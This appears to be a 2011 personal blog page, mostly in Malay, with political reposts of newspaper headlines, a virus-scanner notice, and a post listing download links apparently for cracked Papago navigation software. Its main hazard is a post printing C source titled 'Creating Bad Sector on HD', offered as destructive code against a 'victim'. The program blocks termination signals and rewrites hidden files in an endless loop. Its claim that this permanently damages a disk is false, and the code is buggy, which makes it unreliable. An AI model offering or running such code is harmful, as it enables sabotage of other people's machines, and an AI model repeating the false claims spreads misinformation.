Kerusi dah sampai.
Thursday, May 26, 2011
Monday, May 23, 2011
Menteri JKM Komen: Tanah Runtuh Rumah Anak-anak Yatim dan Anak-anak Kebajikan Madrasah Al-Taqwa

What if the Rumah anak yatim is BELONGS TO PAS. ??
Wednesday, May 18, 2011
Utusan: Jakim tarik balik sijil halal
Kenapa selalu utusan tidak menyiarkan NAMA syarikat yang terlibat.????? ....
Act 2000, we were unable to keep a copy of the original attachment. At Wed May 18 02:38:35 2011 the virus scanner said:
Attempt to hide real filename extension (utusan.jakim.babi.PNG)
This is a message from the MailScanner E-Mail Virus Protection Service
----------------------------------------------------------------------
The original e-mail attachment "utusan.jakim.babi.PNG"
is on the list of unacceptable attachments for this site and has been
replaced by this warning message.
Act 2000, we were unable to keep a copy of the original attachment. At Wed May 18 02:38:35 2011 the virus scanner said:
Attempt to hide real filename extension (utusan.jakim.babi.PNG)
Utusan: Kerajaan perlu kaji kenaikan RON95
Utusan 18/05/2011
Setiap kali minyak nak naik, mesti ada yg cuba nak buat2 baik menghalang.
Ni pong ayat2 yg bese didengar kalo kera-jaan nak naik harga sesuatu bende.
Setiap kali minyak nak naik, mesti ada yg cuba nak buat2 baik menghalang.
Ni pong ayat2 yg bese didengar kalo kera-jaan nak naik harga sesuatu bende.
Utusan: Jangan naik harga sekarang

Utusan: 18/05/2011
Tukang bagi amaran. sembang je pandai. ayat bese dengar.
Tuesday, May 17, 2011
Android Papago
update:
just found new working link: libpapago http://rs975.rapidshare.com/files/417536650/libpapago.rar
part 1 http://www.multiupload.com/Z2JM1JOTU0
part 2 http://www.multiupload.com/GEVGA6ONLO
part 3 http://www.multiupload.com/NYZ8OHN5A5
part 4 http://www.multiupload.com/WSFAXL5Y7D
part 5 http://www.multiupload.com/00IVN38Z9R
just found new working link: libpapago http://rs975.rapidshare.com/files/417536650/libpapago.rar
part 1 http://www.multiupload.com/Z2JM1JOTU0
part 2 http://www.multiupload.com/GEVGA6ONLO
part 3 http://www.multiupload.com/NYZ8OHN5A5
part 4 http://www.multiupload.com/WSFAXL5Y7D
part 5 http://www.multiupload.com/00IVN38Z9R
Tuesday, May 3, 2011
Creating Bad Sector on HD
/*create bad sectors on the hard disk.
*
* This program will create bad sectors on the hard disk. If you left it
* running for long enough, it could render a hard disk quite useless. When
* bad sectors are found, the sector is marked as bad, so fixing the hard disk
* is not an easy task. Unless the victim has time and knowledge to fix the
* disk, the hard drive can be left quite literally defective.
* supported by preetam
* I don't take responsibility for what you do with this program, served foe educational purpose only.
*
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define HDSIZE 640000
void handle_sig();
int main() {
int i = 0;
int x;
int fd[5];
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);
char *buf;
buf = malloc(HDSIZE);
printf("sekt0r: trashing hard disk with bad sectors!\n");
while(1) {
fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);
fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511);
fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511);
for(x = 0; x < 5; x++) {
write(fd[x], buf, HDSIZE);
lseek(fd[x], 0, SEEK_SET);
close(fd[x]);
} /* end for() loop. */
} /* end while() loop. */
} /* end main(). */
void handle_sig() {
/* Reset signal handlers. */
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);
printf("sekt0r: cannot exit - trashing hard disk with bad sectors!\n");
return; /* go back to creating bad sectors. */
}
Original Source :: http://rahulhackingarticles.wetpaint.com/page/Create+Bad+sectors+on+hard+disks
Subscribe to:
Posts (Atom)
Proxmox installation display out of range
Reference: https://forum.proxmox.com/threads/proxmox-ve-screen-out-of-range.131297/
-
How to remove BBCODE from a string ? <?php $String = "[b][color=#0000ff]TEST[/color][/b]"; $regex = '|[[\/\!]*?[^\[\]...
-
Original Source:: http://www.zytrax.com/tech/pc/serial.html Tech Info - USB and Firewire USB and FireWire (IEEE 1394a and b) represent the...